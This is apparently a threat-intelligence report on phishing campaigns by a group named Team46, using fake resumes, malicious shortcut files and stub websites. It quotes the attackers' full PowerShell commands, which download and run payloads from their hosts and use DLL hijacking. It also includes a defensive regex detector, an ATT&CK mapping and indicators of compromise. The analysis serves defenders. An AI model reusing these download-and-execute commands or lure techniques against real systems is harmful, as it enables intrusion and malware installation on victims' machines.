Attacks by Team46
On September 4, researchers from Doctor Web released an interesting report about a failed attack on a Russian freight rail operator. We would like to add our own findings, along with information about other attacks, to that report. We named the group Team46 because the attackers used the domain cybers46.team in their network infrastructure.
First attack
At the end of February, the Threat Intelligence team of the Positive Technologies Expert Security Center found an email with the subject Re: Фронтенд-разработчик (Re: Front-end developer). It was sent from the address jobs@rabotnik.today and disguised as a front-end developer's resume.
The randomly typed phone number in the signature immediately catches the eye. A password-protected archive, Job Application_20240268.rar, is attached to the email; it contains the file Job Application.pdf.lnk, and the archive password (Inna) is given in the body of the email. The email also contains the link rabotnik.today/resume/7952235986937661.rar, which downloads an archive without a password containing the same shortcut. The shortcut launches a PowerShell script, which downloads another PowerShell script from infosecteam.info/other.php?id=jdcz7vyqdoadr31gejeivo6g30cx7kgu (SHA256 c5578c44bb56edc97c0ee974a90912716217c39449649be6755ba9417ecb7e73). That script in turn downloads the decoy document from infosecteam.info/Job%20application.pdf and the main payload from infosecteam.info/base.php. We were unable to obtain the main payload, but it was described by the researchers from Doctor Web.
The decoy document looks like the resume of a certain Inna Fedorovna Kleblets.
The resume contains several factual errors. The email was sent in late February 2024, and the date of birth given is March 10, 1994, so the age should read 29, not 30. In addition, the surname Kleblets does not exist at all.
Initially, the resume listed the email address 8067282501@mail.ru, which was later changed to inna.kleblets@mail.ru. All of this, together with the document metadata, indicates that the file was saved from the hh.ru website and edited in LibreOffice Writer 7.3 on February 7, 2024 at 02:00:00 UTC-05:00, with en-US as the LibreOffice Writer interface language.
A distinctive feature of this attack is that all the domains used host stub sites that create an appearance of legitimacy. Thus, the domain infosecteam.info supposedly belongs to a Russian company called InfoSecTeam.
This may create the impression that the file is not a real attack but a pentest. The site's pages are clearly machine translated. In addition, the address in the site footer is incomplete: no building number is given.
The site template was taken from a WordPress template store.
Interestingly, when searching for the company name on Google, the first two results are the attackers' website, while the real company of the same name, based in the UK, appears only in fourth place.
The same is observed when searching in Yandex.
The domain rabotnik.today also has a stub site.
That site has a Russian version, which is also machine translated.
The attack involves two domains, rabotnik.today and infosecteam.info, registered on 08.12.2023 and 19.02.2024 respectively. In addition, two more domains were found, cybers46.team and cybers4646.my.id, registered on 06/05/2023 and 06/03/2023 respectively; they resolved to 162.0.236.151, as did infosecteam.info. Presumably they were used while the attack was being prepared, which may indicate that this attack is not the group's first. We named the attacking group Team46 after the domain cybers46.team.
The attack itself was clearly large scale: we found almost 4,000 identical shortcuts (differing only in the victim ID) in archives in open directories on infosecteam.info, all uploaded there within three minutes.
Yandex search suggestions also indicate that people have frequently encountered the fake resume described here.
Second attack
In April, PT Expert Security Center experts also discovered similar malicious shortcuts named SCAN_4024_2024_04_02.pdf.lnk and SCAN_4251_2024_03_25.pdf.lnk, which downloaded another decoy document from srv480138.hstgr.cloud/uploads/scan_3824.pdf.
The document was created on 26.02.2024 at 12:00:07 UTC+00:00 using Microsoft: Print To PDF, with the title Remote Desktop Redirected Printer Doc, which indicates that the attackers accessed the document over RDP and then printed it to PDF. The content of the domain srv480138.hstgr.cloud was a complete copy of the site elevation.store, a beauty store in the UAE. The stub site was entirely unrelated to the decoy document; this may indicate that the attackers could also use this server for attacks in the UAE, but we have no confirmation of that.
Technical analysis of attacks
In the first attack, the shortcut launches powershell.exe with the following command:
-w Minimized -ep Bypass -nop -c "irm https://infosecteam.info/other.php?id=jdcz7vyqdoadr31gejeivo6g30cx7kgu | iex"
Each recipient is sent a shortcut with a unique identifier. The shortcut downloads and executes a script with the following content:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -w Minimized -ep Bypass -nop -c "iwr 'http://infosecteam.info/Job%20application.pdf' -OutFile $env:LOCALAPPDATA\Temp\102fa066-cc9d-4a80-b3aa-12d5df196b42.pdf -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.';$env:LOCALAPPDATA\Temp\102fa066-cc9d-4a80-b3aa-12d5df196b42.pdf; iwr 'http://infosecteam.info/base.php' -OutFile $env:LOCALAPPDATA\Yandex\YandexBrowser\Application\Wldp.dll -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.';"
The script downloads the decoy document and opens it, then downloads a payload named wldp.dll into the Yandex Browser folder, using DLL hijacking so that it is loaded in place of the system library of the same name. As its User-Agent, the script uses a string belonging to Microsoft Edge version 121, released on January 25, 2024.
The shortcut from the second attack launches powershell.exe with a similar command:
-w Minimized -ep Bypass -nop -c "irm https://srv480138.hstgr.cloud/warning.php?id=efu8crth52xe73hku1whp10h7i2unsnw | iex"
The identifier is also unique for each target. The shortcut downloads and executes the script:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -w Minimized -ep Bypass -nop -c "iwr 'https://srv480138.hstgr.cloud/uploads/scan_3824.pdf' -OutFile $env:LOCALAPPDATA\Temp\399ha122-tt9d-6f14-s9li-lqw7di42c792.pdf -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.';$env:LOCALAPPDATA\Temp\399ha122-tt9d-6f14-s9li-lqw7di42c792.pdf;iwr 'https://srv480138.hstgr.cloud/report.php?query=$env:COMPUTERNAME' -OutFile $env:LOCALAPPDATA\Temp\AdobeUpdater.exe -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.1 YaBrowser/23.11.0.0 Safari/537.36';$env:LOCALAPPDATA\Temp\AdobeUpdater.exe;"
In this case, the payload is disguised as an Adobe Reader update. Here the User-Agent is a string that already belongs to Microsoft Edge version 120, released on December 7, 2023, even though this attack was carried out later. All shortcuts were created and modified on 11/15/2023 at 11:12:27 UTC. However, in the first attack the computer name is desktop-420!69j and the username is Putin[REDACTED], whereas in the second the computer name is desktop-819jaxj and the username is IgornWay. The second username looks like a case-insensitive replacement of the first one. Such differences in metadata and User-Agent strings may indicate that there is not a single person behind the attacks but a group of people.
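As an added illustration of how a defender could detect the chain described above (this is example detection logic written for this article, not code from the report or from Team46), the following Python runs a few heuristics over constructed sample telemetry: the .pdf.lnk double extension, the minimized PowerShell launch with -ep Bypass -nop, the irm | iex cradle, a DLL written into a browser's Application folder, an .exe dropped into %LOCALAPPDATA%\Temp, and the hostname leaked in the download URL. The event format, the rule names and the sample events are assumptions; the command lines in the samples are abbreviated from the ones quoted above.

```python
import re

# Heuristics for the Team46 delivery chain described above. Added example of defender-side
# detection logic; not code from the report or from the attackers. Rule names, the event
# format and the sample telemetry are assumptions made for this illustration.
RULES = {
    "process": [
        ("ps_minimized_bypass_nop",    re.compile(r"-w\s+Minimized\b.*-ep\s+Bypass\b.*-nop\b", re.I)),
        ("ps_irm_iex_cradle",          re.compile(r"\birm\s+\S+[^|]*\|\s*iex\b", re.I)),
        ("dll_into_browser_appdir",    re.compile(r"-OutFile\s+\$env:LOCALAPPDATA\\\S*\\Application\\\w+\.dll", re.I)),
        ("exe_into_localappdata_temp", re.compile(r"-OutFile\s+\$env:LOCALAPPDATA\\Temp\\[\w.-]+\.exe", re.I)),
        ("hostname_in_download_url",   re.compile(r"https?://\S*\$env:COMPUTERNAME", re.I)),
    ],
    "file": [
        ("double_extension_pdf_lnk",   re.compile(r"\.pdf\.lnk$", re.I)),
    ],
}

def match_rules(kind, value):
    """Names of the rules of the given event kind ('process' or 'file') that fire on value."""
    return [name for name, rx in RULES[kind] if rx.search(value)]

def triage(events):
    """Map event id -> fired rule names. Two or more hits on one PowerShell command line
    is the stager pattern seen in both Team46 attacks."""
    return {e["id"]: match_rules(e["kind"], e["value"]) for e in events}

# Constructed sample telemetry (file-create and process-create events). The three PowerShell
# command lines are abbreviated from the ones quoted in the report; the rest are benign noise.
SAMPLE_EVENTS = [
    {"id": 1, "kind": "file", "value": r"C:\Users\u\Downloads\Job Application.pdf.lnk"},
    {"id": 2, "kind": "process", "value": 'powershell.exe -w Minimized -ep Bypass -nop -c '
        '"irm https://infosecteam.info/other.php?id=jdcz7vyqdoadr31gejeivo6g30cx7kgu | iex"'},
    {"id": 3, "kind": "process", "value": 'powershell.exe -w Minimized -ep Bypass -nop -c '
        r'"iwr http://infosecteam.info/base.php -OutFile $env:LOCALAPPDATA\Yandex\YandexBrowser\Application\Wldp.dll"'},
    {"id": 4, "kind": "process", "value": 'powershell.exe -w Minimized -ep Bypass -nop -c '
        r'"iwr https://srv480138.hstgr.cloud/report.php?query=$env:COMPUTERNAME -OutFile $env:LOCALAPPDATA\Temp\AdobeUpdater.exe"'},
    {"id": 5, "kind": "file", "value": r"C:\Users\u\Downloads\report.pdf"},
    {"id": 6, "kind": "process", "value": "powershell.exe -NoProfile -Command Get-Process"},
]

if __name__ == "__main__":
    for eid, hits in triage(SAMPLE_EVENTS).items():
        print(eid, "SUSPICIOUS" if len(hits) >= 2 else "ok", hits)
```

The DLL rule is deliberately not tied to the Yandex Browser path so that the same drop into any browser's Application folder is caught.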
Conclusion
There is still not enough additional context to clearly attribute the attackers and their true motives. However, judging by the level of preparation and the organizations that were attacked, we can say that we are dealing with an APT group.
We continue to monitor the activity of the Team46 group and expect new attacks from them.
Team46 TTPs according to the MITRE ATT&CK matrix
| ID | Name | Description |
|---|---|---|
| Reconnaissance | | |
| T1589.002 | Gather Victim Identity Information: Email Addresses | Team46 sent targeted phishing emails to leaked email addresses |
| Resource Development | | |
| T1583.001 | Acquire Infrastructure: Domains | Team46 registered several domain names through the registrar Namecheap to give its links a legitimate look |
| T1583.003 | Acquire Infrastructure: Virtual Private Server | Team46 purchased a VPS from Hostinger and used a technical subdomain on hstgr.cloud |
| T1583.004 | Acquire Infrastructure: Server | Team46 hosted servers on Namecheap |
| T1585.002 | Establish Accounts: Email Accounts | Team46 used a dedicated email address to make the emails look legitimate |
| T1608.005 | Stage Capabilities: Link Target | Team46 used its own servers to host archives with malicious shortcuts |
| Initial Access | | |
| T1566.001 | Phishing: Spearphishing Attachment | Team46 sent targeted phishing emails with an attached password-protected RAR archive containing a malicious shortcut, to avoid detection by the email gateway |
| T1566.002 | Phishing: Spearphishing Link | Team46 also used links in targeted phishing emails to a RAR archive without a password, containing the same malicious shortcut |
| Execution | | |
| T1059.001 | Command and Scripting Interpreter: PowerShell | Team46 uses PowerShell scripts to download the staging and main payloads |
| T1204.001 | User Execution: Malicious Link | Team46 tries to trick users into downloading an archive with a malicious shortcut via a link delivered in a phishing email |
| T1204.002 | User Execution: Malicious File | Team46 tries to trick users into opening a malicious shortcut delivered as a phishing attachment |
| Persistence | | |
| T1574.001 | Hijack Execution Flow: DLL Search Order Hijacking | To gain persistence on the system, Team46 planted a substitute wldp.dll in the Yandex Browser folder |
| Defense Evasion | | |
| T1574.001 | Hijack Execution Flow: DLL Search Order Hijacking | To execute the payload, Team46 planted a substitute wldp.dll in the Yandex Browser folder, which allowed it to bypass the sandbox |
IOCs
File indicators
| File name | MD5 | SHA1 | SHA256 |
|---|---|---|---|
| Job Application_20240268.rar | 8fedb5dae41ad563f2276b90930aa341 | a35a21776eb16ed904ba09dd76a5f6dddd7aee98 | c801243a2e14b64ed1d87feef9ce6298d90d72eb2bbff3994d868424c2a2346c |
| Job Application.pdf.lnk | c0df1e743bcc016245de4731fb7220b9 | e59284d6677ede89d525491956258d29cd83c59f | 823d625481fe8b0299850e9758e43b717b6874d42e0112f1b8281bcefedadd31 |
| 7952235986937661.rar | be930ec5fe56fce7abca7df85cb8fecb | 61b99ca03d7f2d19279e53a9e53b31eec49f5bc0 | c101e1f8b4bb6b498ab99a4cf7fd9e62a4126be16409effa379c4f78194b5707 |
| ps1 | 760550ef574cc8f660314a3bf7c21a9d | dca725b40e8f5ba28cd78d285c0e6c77f6b96996 | c5578c44bb56edc97c0ee974a90912716217c39449649be6755ba9417ecb7e73 |
| scan_3824.pdf | 92c0e50193bfc15d29128d41e689625b | e4592319b8c7ed0c6859eac490f52a428b26410b | 62248642faaf84400a23b14c50fdf2ea37ece82262fd344963fbd57bd49973c7 |
| Job application.pdf | 9ab5785378bf723844a0eea7f42a5084 | d77657f52745b3b9331dd55a431a59ac135cac64 | e92ad395f945596ff4e1afaf852119046f663285e4a79792c4db2cf97a2a8f61 |
Network indicators
rabotnik.today
infosecteam.info
cybers46.team
cybers4646.my.id
srv480138.hstgr.cloud
162.0.236.151
203.161.60.229
149.100.138.167
Stanislav Pyzhov
Senior Specialist, Complex Threat Research Group, Positive Technologies Expert Security Center
Denis Kuvshinov
Head of the Threat Intelligence Department, Positive Technologies Expert Security Center